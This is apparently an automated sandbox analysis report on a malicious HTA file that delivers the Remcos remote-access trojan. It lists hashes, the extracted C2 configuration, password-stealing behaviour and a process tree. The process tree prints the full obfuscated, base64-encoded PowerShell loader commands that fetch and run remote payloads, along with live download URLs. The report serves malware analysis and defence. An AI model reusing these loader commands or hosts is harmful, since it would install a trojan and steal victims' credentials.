Analysis
-
max time kernel
149s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
13-12-2024 06:25
Behavioral task
behavioral1
Sample
greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta
Resource
win10v2004-20241007-en
General
-
Target
greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta
-
Size
80KB
-
MD5
fccab384cf7d38618313385c0e22638b
-
SHA1
6e0efbb76a4d4b39a82b7d84393f399ea431b07e
-
SHA256
fc357d0488d2be1a5a49893d842e24d303250346dad592f6b1c8a9511edc15d2
-
SHA512
72c9ba041cbeba138a2e02ac8ccb726c58abaa834386a09c203b9e9f9759e0f4c6e5f2ab3c29ab05f93e573195adb8e43a8a89811505084851eff6748f28a4af
-
SSDEEP
768:tmbUZA+cT/RVeU2Dx6AyZ6LAuAHAgxLiFZpd0LTna8/GdHz6kXd0LcRPi+Bkqr93:tL
Malware Config
Extracted
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20
Extracted
remcos
RemoteHost
submarrine.duckdns.org:6946
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-GH3PRL
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/4104-107-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/2008-108-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/952-106-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/2008-108-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/4104-107-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 3 IoCs
flow pid Process 13 4564 powershell.exe 16 5104 powershell.exe 22 5104 powershell.exe -
Evasion via Device Credential Deployment 1 IoCs
pid Process 4564 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts CasPol.exe -
pid Process 5104 powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 5104 set thread context of 3408 5104 powershell.exe 102 PID 3408 set thread context of 4104 3408 CasPol.exe 104 PID 3408 set thread context of 2008 3408 CasPol.exe 105 PID 3408 set thread context of 952 3408 CasPol.exe 106 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 4564 powershell.exe 4564 powershell.exe 5104 powershell.exe 5104 powershell.exe 952 CasPol.exe 952 CasPol.exe 4104 CasPol.exe 4104 CasPol.exe 4104 CasPol.exe 4104 CasPol.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 3408 CasPol.exe 3408 CasPol.exe 3408 CasPol.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4564 powershell.exe Token: SeDebugPrivilege 5104 powershell.exe Token: SeDebugPrivilege 952 CasPol.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3408 CasPol.exe -
Suspicious use of WriteProcessMemory 40 IoCs
description pid Process procid_target PID 2268 wrote to memory of 4136 2268 mshta.exe 83 PID 2268 wrote to memory of 4136 2268 mshta.exe 83 PID 2268 wrote to memory of 4136 2268 mshta.exe 83 PID 4136 wrote to memory of 4564 4136 cmd.exe 85 PID 4136 wrote to memory of 4564 4136 cmd.exe 85 PID 4136 wrote to memory of 4564 4136 cmd.exe 85 PID 4564 wrote to memory of 4884 4564 powershell.exe 86 PID 4564 wrote to memory of 4884 4564 powershell.exe 86 PID 4564 wrote to memory of 4884 4564 powershell.exe 86 PID 4884 wrote to memory of 528 4884 csc.exe 87 PID 4884 wrote to memory of 528 4884 csc.exe 87 PID 4884 wrote to memory of 528 4884 csc.exe 87 PID 4564 wrote to memory of 1408 4564 powershell.exe 88 PID 4564 wrote to memory of 1408 4564 powershell.exe 88 PID 4564 wrote to memory of 1408 4564 powershell.exe 88 PID 1408 wrote to memory of 5104 1408 WScript.exe 89 PID 1408 wrote to memory of 5104 1408 WScript.exe 89 PID 1408 wrote to memory of 5104 1408 WScript.exe 89 PID 5104 wrote to memory of 3408 5104 powershell.exe 102 PID 5104 wrote to memory of 3408 5104 powershell.exe 102 PID 5104 wrote to memory of 3408 5104 powershell.exe 102 PID 5104 wrote to memory of 3408 5104 powershell.exe 102 PID 5104 wrote to memory of 3408 5104 powershell.exe 102 PID 5104 wrote to memory of 3408 5104 powershell.exe 102 PID 5104 wrote to memory of 3408 5104 powershell.exe 102 PID 5104 wrote to memory of 3408 5104 powershell.exe 102 PID 5104 wrote to memory of 3408 5104 powershell.exe 102 PID 5104 wrote to memory of 3408 5104 powershell.exe 102 PID 3408 wrote to memory of 4104 3408 CasPol.exe 104 PID 3408 wrote to memory of 4104 3408 CasPol.exe 104 PID 3408 wrote to memory of 4104 3408 CasPol.exe 104 PID 3408 wrote to memory of 4104 3408 CasPol.exe 104 PID 3408 wrote to memory of 2008 3408 CasPol.exe 105 PID 3408 wrote to memory of 2008 3408 CasPol.exe 105 PID 3408 wrote to memory of 2008 3408 CasPol.exe 105 PID 3408 wrote to memory of 2008 3408 CasPol.exe 105 PID 3408 wrote to memory of 952 3408 CasPol.exe 106 PID 3408 wrote to memory of 952 3408 CasPol.exe 106 PID 3408 wrote to memory of 952 3408 CasPol.exe 106 PID 3408 wrote to memory of 952 3408 CasPol.exe 106
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4136 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePOwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4564 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mppwhtsx\mppwhtsx.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC880.tmp" "c:\Users\Admin\AppData\Local\Temp\mppwhtsx\CSC67C289579A3E4F1693845232D6BE962.TMP"5⤵
- System Location Discovery: System Language Discovery
PID:528
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5104 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3408 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\wccgoiszgtkngkclpaf"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4104
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\hxhypbdtubdarqqphlascl"7⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:2008
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\rzurqlovijvetenbqvmunqhxby"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:952
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
102B
MD53bda67e214b356fd12f1b56a894ba28e
SHA143df81af632f0f375847072ef8e97bf1df0a4c88
SHA256cf736f9bcc9ff76b8ed1acd0717abcb5653b00b4c988f924be2dbff5bd1189e0
SHA5127e26ae9be9906545a0ba333a517c24b6f03a3d6fae79bfd08c2a108f28bf953c62a26b153e17e10f0847e24e488d326061b5c8e83b56f5586433eaa5d6a3638d
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
19KB
MD5a963e141fadf5a8fbbbefca423c15bf0
SHA1c379fcfc77628e2182b98a290b7f97714bd3f482
SHA256b7ab54c3ae3e993010704b35aacd09066984d8301a457faeff12b0c49e0f5fec
SHA5125eeb449090239772030056bf07e5308baa52963e0c84161c03d5ef671663d31c56c2d4643372e8c94625432663f9a5d6b2f712d0654bc8e109a0a99aee912537
-
Filesize
1KB
MD5a658bb6e75316b30d6eed1956370c426
SHA1861bd25ecbdc3f673f566dda7cc6f065339da7d4
SHA2560180d6d286043353bb60091624fcd68adae3d29d18861fe2ee0a5183c938fe70
SHA512c7d17817089df1e706c9605297a8408033fdc5efadb56feeb75ec3e40e6e8de14471e8c8597ec3358215fca2b2f8123c15ff0041bd28327db0967bc63c519624
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5ab4aea6ff781a2134da3c4ccf000f924
SHA169eb6fbb776c6e2af73993e41e984843bde5e450
SHA256a7555ea8b5bcd939b3224956ca5774067bb97973d63b833cec59043e6cc57a9f
SHA5120249a9910de61fe14a17ed03512633df0ea2822778bcc47c295679bc90e7279875def2c6f3da810948b3e0d4805b3b2d84b13f5b577fa33680368e3633e5e717
-
Filesize
4KB
MD579f35c7500a5cc739c1974804710441f
SHA124fdf1fa45049fc1a83925c45357bc3058bad060
SHA256897101ed9da25ab0f10e8ad1aeb8dabc3282ccfdb6d3171dbac758117b8731f4
SHA51203281e8abecff4e7d1f563596a4fd2513e016b7fbf011a455141460f9448d00b4a4666d2036cb448a8ac9a6feebeb51b366289ffa2ee5524a062fe8869aec61e
-
Filesize
150KB
MD561bcbe69140cdee35ac40f1d97773746
SHA1bb5d746eca7a18890b642e6952eb9c5f71dedaaa
SHA256d68723edcf3ff4f0c7ded177c7eebd74df498b8d16b111fac54f1c11e37c93cf
SHA512303ee3b3b8620f536c3e298bd65557badf251870ca46656741c8d787a351f3abca94fe39bb701563aef9c7c85f89bbdb447704e1f5bce1b63701f575db5e4b0b
-
Filesize
652B
MD595457db036fdd62f7df30f79011e3449
SHA1533ce60ab3a55dded803da6be2be0725e561bfc4
SHA2564951cda314c5817fa3262297f53545996c1a971a2b175c37444c43828d6b3303
SHA51259f3b8df3807d60617b1ed76e11f4208245ee1f120ce4bdad2a8c9cff6436d98a4343ded9cc30360b7af18246824caededcd6542deb6552562e9ea228612dd12
-
Filesize
483B
MD5567f2c2af7886bd10a602edea0dbb33b
SHA1aaa2f286d79889f3ae9cd98b9b728f832a0981bd
SHA256942b49df85678ada85046144cac22ee63e865763ea87b1ab1aa56e86e8fe2dac
SHA5128ce20e4dff36398aa1b520c2959907662216003c20085cc6ecf1e612e4005683b187afbe423c3d7a3bdb7da16995526894f264ec4094d3741573eebc7fc35c4c
-
Filesize
369B
MD5704c779567c342292ae821fffff952d0
SHA13944879a3650a33a2073b140d724d414970f0a25
SHA256d61125cd20dd3fa8205fbdc34caee82489d45500ad11e6e20e53cb361a57fbc5
SHA51281cb8865c60f5991ab1ce1aa92f000f3a9e30ba2e6171bfaa691e602cce9d0806285560af3ff32c464d64745a011ad08bbe79a54264d327ba8258e62162b9004